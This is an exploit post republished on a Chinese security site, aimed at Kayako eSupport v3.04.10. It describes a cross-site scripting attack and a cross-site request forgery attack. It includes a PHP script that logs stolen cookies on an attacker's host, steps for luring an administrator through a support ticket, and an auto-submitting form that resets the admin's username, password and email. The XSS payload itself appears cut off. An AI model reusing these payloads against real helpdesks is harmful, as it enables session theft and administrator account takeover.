Kayako eSupport v3.04.10 XSS/CSRF Vulnerabilities

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Kayako eSupport v3.04.10 XSS/CSRF Vulnerabilities

来源：vfocus.net 作者： D3V!L FUCKER 发布时间：2010-01-04

#################################################################################################################
[+] Exploit Title : kayako (xss/xsrf) Remote Vulnerabilities
[+] Author : By D3V!L FUCKER
[+] Script Link : http://www.kayako.com/solutions/esupport/
[+] Version :  Kayako eSupport v3.04.10
[+] Tested on : linux ubuntu 9.10
[+] Code :
#################################################################################################################
+++++++++++++++++++++++++
http://server/path/staff/index.php?_m=tickets&_a=manage&s_query=">
==================================================================
PoC
--
[+] Make 2 files and upload to your host :
[+]cookie.php  - > Put in this File That Code:
 <?php
 $cookie = $_GET['cookie'];
 $log = fopen("log.txt", "a");
 fwrite($log, $cookie ."\n");
 fclose($log);
 ?>
[+]log.txt   - > CHMOD it 777 and put in the same directory with cookie.php

[+]Exploit:
   -------
1) Register in The SIte
2)Open New Ticket
3)We Put in
  To:admin name
  Subject: Some Subject
  Message: http://server/path/staff/index.php?_m=tickets&_a=manage&s_query="> //Cover The Link By Any Thing Use Your Brain
  The js code Worked When The admin Read The Message
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2) Xsrf POC
+++++++++++++++++

<form name="staffform" id="staffform" action="http://site.com/path/admin/index.php?_m=core&_a=editstaff&staffid=1" method="POST">

<body onload="document.forms.staffform.submit();">
<!-- Name -->
<input type="hidden" name="fullname" id="fullname" value="admin" /><br>

<!-- UserName -->
<input type="hidden" name="username" id="username" value="admin" /></br>

<!-- password -->
<input type="hidden" name="password" id="password" value="123123" /></br>

<!-- Re-enter Password -->
<input type="hidden" name="passwordconfirm" id="passwordconfirm" value="123123" /></br>

<!-- E-mail -->
<input type="hidden" name="email" id="email" value="w0@live.no" /></br>

<!-- Mobile Phone Number -->
<input type="hidden" name="mobilenumber" id="mobilenumber" value="" /></br>


<!-- Group -->
<input type="hidden" name="staffgroupid" value="1" /></br>


<!-- Assigned Departments -->
<input type="hidden" name="assigneddepid[]" value="1" /></br>

<input type="hidden" name="submitbutton" class="yellowbuttonbig" value="Update Staff" /> </br>

</table></td></tr></tbody></table>

<input type="hidden" name="_m" value="core"/>

<input type="hidden" name="_a" value="editstaff"/>

<input type="hidden" name="step" value="1"/>

<input type="hidden" name="staffid" value="1"/>


</form>

</html>

################################################################################################################

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告